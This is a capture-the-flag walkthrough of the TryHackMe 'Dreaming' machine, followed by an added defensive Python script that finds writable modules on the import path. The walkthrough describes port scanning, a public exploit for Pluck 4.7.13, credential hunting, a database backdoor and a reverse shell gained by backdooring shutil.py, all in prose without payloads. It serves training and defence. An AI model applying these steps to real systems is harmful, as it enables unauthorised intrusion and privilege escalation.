Dreaming
Lab Setup
mkdir ~/Documents/TryHackMe/dreaming
cd ~/Documents/TryHackMe/dreaming
mkdir recon enumeration notes
touch notes/{README.md,vulns,creds}
export IP=10.10.224.75
export URL=http://$IP
Enumeration
First, let's scan the machine for open ports. I usually do this with nmap. You need to run this command as root.
nmap -Pn -p- -v -T4 --max-retries 5 $IP -oN recon/nmap.init;
cat recon/nmap.init | grep '/.*open'| cut -d '/' -f 1| tr '\n' ', '| sed 's/.$//g' > recon/ports;
sudo nmap -Pn -sS -sV -n -v -A -T4 -p $(cat recon/ports) $IP -oN recon/nmap.alltcp
This will take a while, so I use rustscan to make a quick scan.
rustscan -a $IP --ulimit 5000 -- -sC -sV -v -oN recon/rustscan.init
There are not many open ports, so let's enumerate the HTTP port. It is the default apache2 page. I use the feroxbuster tool for fuzzing, and I found an interesting directory.

Exploitation
In /app I found the main website folder /pluck-4.7.13. If you search on exploit-db you will find an exploit to get a shell.

The next step is to enumerate this machine and get access as a user. In /opt I found 2 interesting files, getDreams.py and test.py, where I found the password for lucien.
In the home directory you will find the first flag.
When I log in as a user with a password, the first thing I do is run the sudo -l command to see if that user can run commands as root.

It seems that when I run the script in the home directory of the death user, it prints out a name and, for each name, a desire. I remember that I saw this file name in /opt, so I can see the code behind this output.
There is an issue in this script. It selects the dreamer and dream columns and will execute the query.
So we need to put a backdoor in the database and execute the Python code, and we will obtain a shell as death.
The password for the database is not the same as the one for the ssh connection. After a lot of enumeration I found the password in the .bash_history file.
In the home directory of the death user you can get the second flag.
After a lot of enumeration I needed some help to get the next flag. I saw in the home directory of the morpheus user a Python script that imports copy2 from the shutil module. Finally I saw that the death user can edit the /usr/lib/python3.8/shutil.py file.
Put a backdoor in this file and get a reverse shell.
Open a listener and you will get a shell. In the home directory of morpheus you will find the flag.
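A defender-side check for the weakness used in the last step (a standard-library module that a non-root account can edit), as an added example that is not part of the original write-up: it walks an import path and reports module files and package directories that are group-writable, world-writable or not owned by a trusted uid. The function names and the sample tree in demo() are constructed for illustration, and POSIX ACLs are not inspected.

```python
import os
import stat
import sys
import tempfile

MODULE_SUFFIXES = (".py", ".pyc", ".so")

def write_risks(path, trusted_uids):
    """Return the reasons an untrusted account could modify path (mode bits only)."""
    try:
        st = os.stat(path)              # follows symlinks to the real target
    except OSError:
        return []                       # broken link or unreadable entry
    reasons = []
    if st.st_uid not in trusted_uids:
        reasons.append(f"owned by uid {st.st_uid}")
    if st.st_mode & stat.S_IWGRP:
        reasons.append(f"writable by gid {st.st_gid}")
    if st.st_mode & stat.S_IWOTH:
        reasons.append("world-writable")
    return reasons

def audit_import_path(dirs, trusted_uids=(0,)):
    """Map each risky module file or package directory under dirs to its reasons."""
    findings = {}
    for top in filter(os.path.isdir, dirs):
        for root, _subdirs, files in os.walk(top):
            # A writable directory is as bad as a writable file: modules in it
            # can be replaced or shadowed.
            paths = [root] + [os.path.join(root, f) for f in files
                              if f.endswith(MODULE_SUFFIXES)]
            for path in paths:
                reasons = write_risks(path, trusted_uids)
                if reasons:
                    findings[path] = reasons
    return findings

def demo():
    """Constructed sample tree: one group-writable module, one locked-down module."""
    top = tempfile.mkdtemp()            # created 0700 and owned by the current user
    for name, mode in (("shutil.py", 0o664), ("os.py", 0o644)):
        path = os.path.join(top, name)
        open(path, "w").close()
        os.chmod(path, mode)
    return top, audit_import_path([top], trusted_uids=(os.getuid(),))

if __name__ == "__main__":
    # Real use: audit the interpreter's own import path, trusting only root.
    for path, reasons in sorted(audit_import_path(sys.path).items()):
        print(path, "->", ", ".join(reasons))
```

Any finding under a system import path means a script run by another user, or by root through sudo, can be made to execute code chosen by whoever holds that write access.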